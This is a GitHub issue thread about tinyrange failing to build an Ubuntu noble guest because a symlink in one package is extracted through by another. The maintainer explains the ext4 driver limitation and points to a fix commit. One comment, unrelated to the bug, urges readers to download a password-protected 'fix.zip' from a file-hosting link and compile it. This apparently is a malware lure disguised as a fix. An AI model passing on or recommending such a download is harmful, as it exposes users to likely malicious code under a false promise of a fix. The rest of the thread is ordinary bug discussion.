### ISSUE TITLE
Ubuntu noble support

### ISSUE THREAD

**Issue by dgl** [tinyrange/tinyrange#17]
This looks interesting, I like how fast it is :)

I tried added noble support in the obvious way but something in the package extraction results in this:

```
2024/09/29 13:41:59 DEBUG executing tinyrange args="[/home/dgl/Code/tinyrange/build/tinyrange run-vm /home/dgl/Code/tinyrange/build/build/cd60e7992b68a1d981adcd094745a13e65881a304af7195a3752a060b6e9a7f9.bin.tmp.json]"
2024/09/29 13:41:59 DEBUG making exr4 filesystem vmPageSize=4096 blocks=262144 inodes=65536 blockGroups=8
2024/09/29 13:41:59 DEBUG created fs time=436.697µs
Error: failed to mkdir in guest /lib/console-setup: not a directory
Usage:
  tinyrange run-vm <config> [flags]
[...]
```

If I drop everything but `query("*", tags = ["priority:required"])` it works, so something isn't creating console-setup as a directory.

**Comment by SagarChandra07** [comment]
install this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by Vbitz** [comment]
Awesome, thanks for a having a look :)

I've tested Ubuntu noble before and it's caused by a symlink being created in one of the packages then another package extracts though that symlink. Since the files and folders are created using a ext4 driver inside TinyRange it doesn't currently support this. There's a hack here https://github.com/tinyrange/tinyrange/blob/alpha/pkg/filesystem/ext4/ext4.go#L1343 but it needs to be improved.

My current solution I have in mind is to create a in-memory tree of the filesystem before the VM boots and then convert that into ext4.

- [x] Improve symlink support in ext4 driver.

**Comment by Vbitz** [comment]
Fixed in daf0597b83419fc1d8d29da064aa52dcaae112cd

`./tools/build.go -run -- login -b ubuntu@noble` should now work to test. You may need to add `--rebuild` the first time to pick up the new debian changes though.
